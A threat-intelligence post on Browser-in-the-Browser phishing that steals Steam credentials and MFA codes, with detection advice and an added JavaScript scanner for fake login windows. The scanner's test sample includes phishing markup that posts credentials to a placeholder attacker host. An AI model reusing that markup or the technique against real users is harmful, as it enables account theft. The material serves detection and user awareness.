Hackers Steal Steam Accounts in New Browser-in-the-Browser Attacks

Threat actors are using new phishing techniques to steal credentials to the digital gaming platform Steam with the intent to sell them to other users. The phishing technique used is known as a Browser-in-the-Browser attack, a sophisticated technique in which a fake browser window is rendered inside the page that is already open.

In these campaigns, targeted users receive direct messages on Steam inviting them to join a tournament for a popular video game. The message includes a link to a website for what appears to be an organization hosting eSports competitions, and the site requires users to log in to their Steam account to sign up. This triggers what appears to be a new browser window containing the Steam login page. The window, however, is not a new browser window; it is a fake window drawn within the current page. The fake window is styled to look like the Steam login page, including the legitimate Steam URL in the address bar and the HTTPS lock icon, but any credentials entered are sent to the threat actor instead. These pages are sophisticated enough to prompt for and steal MFA codes as well. Once the victim completes the login, the webpage redirects the browser to a legitimate address in an attempt to hide the fact that credentials were just stolen.

At this point, the threat actors quickly hijack the Steam accounts, changing passwords and email addresses to make it more difficult for victims to regain access. This phishing method, using Browser-in-the-Browser attacks, is gaining in popularity among threat actors due to its sophisticated nature and users’ difficulty in determining that it is a phishing attempt.

Analyst Notes

Due to the sophisticated nature of a Browser-in-the-Browser attack, it can be hard to detect. One option is to block JavaScript within the web browser. Since this attack relies heavily on JavaScript, this step would prevent the pop-up window from being displayed. However, this may not be feasible for every organization, as doing so will also likely break several legitimate and popular websites. One method of manual detection for this attack is to determine whether the pop-up window can be dragged out of the original browser window. Since the pop-up window is simply part of the webpage in the original window, it cannot be moved outside the confines of that browser window. If a particular pop-up window cannot be dragged to another screen, there is a high probability that it is a phishing attack using this technique. The best way to prevent this type of attack from occurring is to recognize the phishing attempt on initial contact. It is highly recommended not to click on links provided by unknown users on Steam, Discord, or other instant messaging platforms. This also extends to email, where all links sent in emails should be heavily scrutinized before accessing them. These steps can help prevent a user from falling for a sophisticated phishing attack in the first place.
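The two indicators described above (a trusted URL drawn as page content rather than in the real address bar, and a credential form that posts somewhere other than the site it claims to be) can be checked in captured page markup, for example by an analyst triaging a reported phishing link or by a URL-scanning pipeline. The following is an added example written for this post, not code from the original article or from any vendor; the trusted hostnames, the placeholder attacker host, and the sample HTML are constructed for the demonstration, and the heuristics are an assumption about how such kits are typically built rather than a description of any specific campaign.

```javascript
// Heuristic scanner for Browser-in-the-Browser (BitB) page markup.
// Added example, not from the original post. A BitB "login window" is ordinary
// page content: a container styled as browser chrome, a fake address bar that
// shows a trusted URL as plain text, and a credential form that submits to the
// attacker. None of it is a real window, so the markup itself carries the clues.

// Assumption: the login hosts a Steam-themed BitB page would impersonate.
const TRUSTED_LOGIN_HOSTS = new Set([
  "steamcommunity.com",
  "store.steampowered.com",
]);

// Hostname of an absolute URL, or null when the value does not parse.
function hostOf(url) {
  try {
    return new URL(url).hostname.toLowerCase();
  } catch {
    return null;
  }
}

// Returns a list of {kind, detail} findings for the given HTML string.
function scanForBitB(html) {
  const findings = [];

  // Indicator 1: a trusted URL rendered as visible text inside a non-anchor
  // element. A real address bar is browser chrome and never appears in the
  // DOM, so a fake one has to be drawn with HTML (a <span>, <div>, etc.).
  const textUrlRe = /<(\w+)\b[^>]*>\s*(https?:\/\/[^\s<]+)\s*</gi;
  for (const m of html.matchAll(textUrlRe)) {
    const [, tag, url] = m;
    const host = hostOf(url);
    if (tag.toLowerCase() !== "a" && host && TRUSTED_LOGIN_HOSTS.has(host)) {
      findings.push({ kind: "fake-address-bar", detail: `${url} drawn inside <${tag}>` });
    }
  }

  // Indicator 2: a form with a password field whose action points at a host
  // other than the one the page pretends to be. That is where the stolen
  // credentials (and any MFA code) would go.
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  for (const m of html.matchAll(formRe)) {
    const [, attrs, body] = m;
    if (!/type\s*=\s*["']?password/i.test(body)) continue;
    const action = (attrs.match(/\baction\s*=\s*["']([^"']+)["']/i) || [])[1] || "";
    const host = hostOf(action);
    if (host && !TRUSTED_LOGIN_HOSTS.has(host)) {
      findings.push({ kind: "offsite-credential-form", detail: `password form posts to ${host}` });
    }
  }
  return findings;
}

// Both indicators together are a strong signal; either one alone is worth a look.
function verdict(findings) {
  const kinds = new Set(findings.map((f) => f.kind));
  if (kinds.has("fake-address-bar") && kinds.has("offsite-credential-form")) return "likely-bitb";
  return kinds.size > 0 ? "suspicious" : "clean";
}

// Constructed sample in the style the post describes: a fake window with a
// title bar, a lock glyph, the Steam URL as text, and a form that posts to a
// placeholder attacker host (attacker.example is not a real domain).
const SAMPLE_BITB_HTML = `
<div id="tournament">
  <h1>Sign up for the tournament</h1>
  <div class="fake-window" style="position:fixed">
    <div class="titlebar">Sign in - Steam Community</div>
    <div class="addressbar"><span class="lock">&#128274;</span>
      <span class="url">https://steamcommunity.com/login/</span></div>
    <form action="https://attacker.example/collect" method="post">
      <input name="username"><input name="password" type="password">
      <input name="twofactorcode" placeholder="Steam Guard code">
      <button>Sign in</button>
    </form>
  </div>
</div>`;

// Constructed benign sample: a real hyperlink to the login page and an
// unrelated form with no password field should produce no findings.
const SAMPLE_BENIGN_HTML = `
<p>Register with your Steam account at
  <a href="https://steamcommunity.com/login/">https://steamcommunity.com/login/</a>.</p>
<form action="/newsletter" method="post"><input name="email"><button>Subscribe</button></form>`;

// Usage: node bitb-scan.js
console.log(scanForBitB(SAMPLE_BITB_HTML), verdict(scanForBitB(SAMPLE_BITB_HTML)));
console.log(scanForBitB(SAMPLE_BENIGN_HTML), verdict(scanForBitB(SAMPLE_BENIGN_HTML)));
```

The scanner deliberately treats a URL inside an <a> element as normal, since legitimate pages often show a link's address as its text; what it flags is a trusted login URL drawn as plain content, which is exactly what the fake address bar has to do. The regular expressions are a triage aid over captured markup, not a substitute for the drag test or for user awareness described above, and a kit that builds the fake chrome entirely at runtime would need the rendered DOM rather than the raw HTML.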